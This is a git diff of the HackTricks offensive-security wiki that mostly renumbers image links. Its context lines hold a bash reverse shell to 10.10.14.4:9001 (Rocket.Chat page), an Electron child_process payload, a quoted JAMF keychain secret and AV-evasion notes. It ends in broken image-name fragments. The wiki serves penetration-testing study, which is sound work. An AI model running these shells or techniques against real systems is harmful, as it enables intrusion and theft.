diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png
index 218780f03..3ae281225 100644
Binary files a/.gitbook/assets/image (11).png and b/.gitbook/assets/image (11).png differ
diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png
index 248451f19..c78341920 100644
Binary files a/.gitbook/assets/image (13).png and b/.gitbook/assets/image (13).png differ
diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png
index 4ede9266b..a254c23a8 100644
Binary files a/.gitbook/assets/image (14).png and b/.gitbook/assets/image (14).png differ
diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png
deleted file mode 100644
index 0ef3cc20b..000000000
Binary files a/.gitbook/assets/image (15).png and /dev/null differ
diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png
index 20ead5c09..e8b6b2135 100644
Binary files a/.gitbook/assets/image (16).png and b/.gitbook/assets/image (16).png differ
diff --git a/.gitbook/assets/image (17) (3).png b/.gitbook/assets/image (17) (3).png
index 9b6db2a3a..feabde2df 100644
Binary files a/.gitbook/assets/image (17) (3).png and b/.gitbook/assets/image (17) (3).png differ
diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png
index 77f2a8962..9b6db2a3a 100644
Binary files a/.gitbook/assets/image (17).png and b/.gitbook/assets/image (17).png differ
diff --git a/.gitbook/assets/image (18).png b/.gitbook/assets/image (18).png
index 3ae281225..c0008cb7b 100644
Binary files a/.gitbook/assets/image (18).png and b/.gitbook/assets/image (18).png differ
diff --git a/.gitbook/assets/image (19) (1).png b/.gitbook/assets/image (19) (1).png
index 3305c8600..ab835abd2 100644
Binary files a/.gitbook/assets/image (19) (1).png and b/.gitbook/assets/image (19) (1).png differ
diff --git a/.gitbook/assets/image (19).png b/.gitbook/assets/image (19).png
index c78341920..3305c8600 100644
Binary files a/.gitbook/assets/image (19).png and b/.gitbook/assets/image (19).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (2) (1).png b/.gitbook/assets/image (2) (1) (1) (2) (1).png
new file mode 100644
index 000000000..c3ffd5532
Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (2) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (2).png b/.gitbook/assets/image (2) (1) (1) (2).png
index c3ffd5532..163b502de 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (2).png and b/.gitbook/assets/image (2) (1) (1) (2).png differ
diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png
index 163b502de..eb7611c98 100644
Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index eb7611c98..4bb5f2707 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 4bb5f2707..ed57bd5ff 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (20) (1).png b/.gitbook/assets/image (20) (1).png
index e5d569d4c..fc66de854 100644
Binary files a/.gitbook/assets/image (20) (1).png and b/.gitbook/assets/image (20) (1).png differ
diff --git a/.gitbook/assets/image (20).png b/.gitbook/assets/image (20).png
index a254c23a8..e5d569d4c 100644
Binary files a/.gitbook/assets/image (20).png and b/.gitbook/assets/image (20).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png
index 455fbb8b7..eb57ea914 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png
index eb57ea914..6874f9c86 100644
Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png
index 6874f9c86..38b71f3d4 100644
Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index 38b71f3d4..218780f03 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png
new file mode 100644
index 000000000..2fde683ec
Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png
index 2fde683ec..6c4e73dca 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png
index 6c4e73dca..0d4cd8ba0 100644
Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png
index 0d4cd8ba0..743e51c38 100644
Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 743e51c38..248451f19 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image (5) (1) (1) (2) (1).png b/.gitbook/assets/image (5) (1) (1) (2) (1).png
new file mode 100644
index 000000000..5dc69a4e7
Binary files /dev/null and b/.gitbook/assets/image (5) (1) (1) (2) (1).png differ
diff --git a/.gitbook/assets/image (5) (1) (1) (2).png b/.gitbook/assets/image (5) (1) (1) (2).png
index 5dc69a4e7..114d35653 100644
Binary files a/.gitbook/assets/image (5) (1) (1) (2).png and b/.gitbook/assets/image (5) (1) (1) (2).png differ
diff --git a/.gitbook/assets/image (5) (1) (1).png b/.gitbook/assets/image (5) (1) (1).png
index 114d35653..4642e6584 100644
Binary files a/.gitbook/assets/image (5) (1) (1).png and b/.gitbook/assets/image (5) (1) (1).png differ
diff --git a/.gitbook/assets/image (5) (1).png b/.gitbook/assets/image (5) (1).png
index 4642e6584..4fbfba8c7 100644
Binary files a/.gitbook/assets/image (5) (1).png and b/.gitbook/assets/image (5) (1).png differ
diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png
index 4fbfba8c7..4ede9266b 100644
Binary files a/.gitbook/assets/image (5).png and b/.gitbook/assets/image (5).png differ
diff --git a/.gitbook/assets/image (6) (2) (1).png b/.gitbook/assets/image (6) (2) (1).png
new file mode 100644
index 000000000..5e0361188
Binary files /dev/null and b/.gitbook/assets/image (6) (2) (1).png differ
diff --git a/.gitbook/assets/image (6) (2).png b/.gitbook/assets/image (6) (2).png
index 5e0361188..345e6bee9 100644
Binary files a/.gitbook/assets/image (6) (2).png and b/.gitbook/assets/image (6) (2).png differ
diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png
index 345e6bee9..0ef3cc20b 100644
Binary files a/.gitbook/assets/image (6).png and b/.gitbook/assets/image (6).png differ
diff --git a/.gitbook/assets/image (7) (1) (3).png b/.gitbook/assets/image (7) (1) (3).png
new file mode 100644
index 000000000..9a68acef6
Binary files /dev/null and b/.gitbook/assets/image (7) (1) (3).png differ
diff --git a/.gitbook/assets/image (7) (1).png b/.gitbook/assets/image (7) (1).png
index 9a68acef6..d990711a1 100644
Binary files a/.gitbook/assets/image (7) (1).png and b/.gitbook/assets/image (7) (1).png differ
diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png
index d990711a1..20ead5c09 100644
Binary files a/.gitbook/assets/image (7).png and b/.gitbook/assets/image (7).png differ
diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png
index ed57bd5ff..77f2a8962 100644
Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ
diff --git a/backdoors/salseo.md b/backdoors/salseo.md
index d98dbce9c..21f0bc44f 100644
--- a/backdoors/salseo.md
+++ b/backdoors/salseo.md
@@ -105,11 +105,11 @@ Open the SalseoLoader project using Visual Studio.
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
- (1) (1) (1).png>)
+ (1) (1) (1) (1).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
- (1) (1) (1).png>)
+ (1) (1) (1) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
@@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
- (1) (1) (2).png>)
+ (1) (1) (2) (1).png>)
### **Exit Visual Studio and execute DllExport\_configure**
diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
index c6aede60f..fdcfd6a9b 100644
--- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
@@ -137,7 +137,7 @@ Arguments of the script:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
```
-
+
**Our host seems to be in trouble :)**
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 36887f554..3f5fc29af 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -49,11 +49,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
-.png>)
+.png>)
#### JAMF device Authentication
-
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
@@ -100,7 +100,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and
#### Secrets stealing
-
a
+
a
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
@@ -203,7 +203,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
-
+
## References
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md
index f8bd4db19..d12d0a87c 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md
@@ -23,7 +23,7 @@ This function will make the **allowed binary own the PID** but the **malicious X
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
Like for example in this image (taken from the reference):
-
+
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index 6796980af..02009b0be 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -22,7 +22,7 @@ Obviously, this is so powerful, it's complicated to load a kernel extension. The
* Going into **recovery mode** Kexts need to be **allowed to be loaded**:
-
+
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed.
* The Kext also needs to be **notarized**, Apple will be able to check it for malware.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index c63f3ab5e..23d5baf48 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -16,7 +16,7 @@
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
-
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
@@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into
### Endpoint Security Framework Architecture
-
+
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
index 8ba505314..9e8cd3962 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
@@ -76,7 +76,7 @@ fat_magic FAT_MAGIC
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
-
+
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
@@ -199,11 +199,11 @@ struct section_64 { /* for 64-bit architectures */
Example of **section header**:
-
+
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
-
+
It's also possible to get **headers information** from the **command line** with:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
index 0ad7001c4..8de71d0c0 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@@ -32,7 +32,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
{% endcode %}
{% hint style="danger" %}
-Note that now **hardened** Electron applications will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
+Note that now **hardened** Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
{% endhint %}
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 1dad22560..5ec636d80 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -14,7 +14,7 @@
## Sandbox loading process
-
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
index 6aa9757b4..3a92811ea 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
@@ -143,7 +143,7 @@ $> ls ~/Documents
Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
-
+
### CVE-2021-XXXX - Translocation
@@ -387,7 +387,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
-
+
## Reference
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md
index a67a09b63..15e1f2d1a 100644
--- a/network-services-pentesting/pentesting-postgresql.md
+++ b/network-services-pentesting/pentesting-postgresql.md
@@ -479,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
-
+
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index 1a169ddc9..656d66b99 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -42,7 +42,7 @@ davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every
Output sample:
- (1) (1).png>)
+ (1).png>)
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md
index 64584b99d..4aa91eb71 100644
--- a/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -35,12 +35,12 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
* Configure WebHook script:
-
+
* Save changes
* Get the generated WebHook URL:
-
+
* Call it with curl and you shuold receive the rev shell
diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index 759ce057a..0ef0b9a48 100644
--- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -206,7 +206,7 @@ The following will add a `Location` header to the response
```
-
+
#### CRLF in Add header (**CVE-2019-2438)**
diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md
index 4d219b62c..62d377de1 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -27,11 +27,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
In the Burp's builtin browser go to the **Burp extension** and enable it:
-
+
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
-
+
### Inject a Canary
@@ -69,7 +69,7 @@ You can click each message to view more detailed information about it, including
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
-
+
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
diff --git a/todo/radio-hacking/flipper-zero/fz-ibutton.md b/todo/radio-hacking/flipper-zero/fz-ibutton.md
index f004a9314..50831ea8c 100644
--- a/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -24,7 +24,7 @@ For more info about what is an iButton check:
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
-
+
## Actions
diff --git a/todo/radio-hacking/ibutton.md b/todo/radio-hacking/ibutton.md
index 43169dffa..777c83633 100644
--- a/todo/radio-hacking/ibutton.md
+++ b/todo/radio-hacking/ibutton.md
@@ -16,7 +16,7 @@
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
-
+
### What is iButton?
diff --git a/todo/radio-hacking/infrared.md b/todo/radio-hacking/infrared.md
index 9ccdb0822..1a415aad0 100644
--- a/todo/radio-hacking/infrared.md
+++ b/todo/radio-hacking/infrared.md
@@ -32,7 +32,7 @@ IR protocols differ in 3 factors:
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
-
+
**2. Pulse Width Encoding**
diff --git a/windows-hardening/active-directory-methodology/ad-certificates.md b/windows-hardening/active-directory-methodology/ad-certificates.md
index 730a7f971..64d990a34 100644
--- a/windows-hardening/active-directory-methodology/ad-certificates.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates.md
@@ -7,7 +7,7 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -113,7 +113,7 @@ The **security descriptor** configured on the **Enterprise CA** defines these ri
This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry:
-
+
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default.
@@ -226,7 +226,7 @@ certutil -v -dstemplate #enumerate certificate templates
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md
index fae40774e..aa765ddf4 100644
--- a/windows-hardening/av-bypass.md
+++ b/windows-hardening/av-bypass.md
@@ -54,7 +54,7 @@ It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you c
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
-
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
@@ -303,7 +303,7 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
-
+
* **Inline**
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 3e6568daa..e97e14a64 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -57,7 +57,7 @@ if ($envPath -notlike "*$folderPath*") {
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
-
+
### Missed Dlls
 (1) (2).png)
 (1).png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
 (1).png)
 (1).png)
 (1) (1).png)
.png)
.png)
.png)
.png)
 (1).png)
 (1) (1).png)
 (2).png)
 (1).png)
 (1) (1).png)
.png)
 (1).png)
.png)
.png)
.png)
.png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1).png)
 (1) (1) (2).png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1).png)
 (1) (1) (2).png)
 (1).png)
 (1) (1).png)
 (1).png)
 (1).png)
 (1).png)
.png)
 (1).png)
.png)
 (3).png)
.png)
 (2).png)
 (2) (1).png)
 (1) (1) (2).png)
 (1) (1) (2) (1).png)
 (1).png)
 (1) (3).png)
 (3).png)
.png)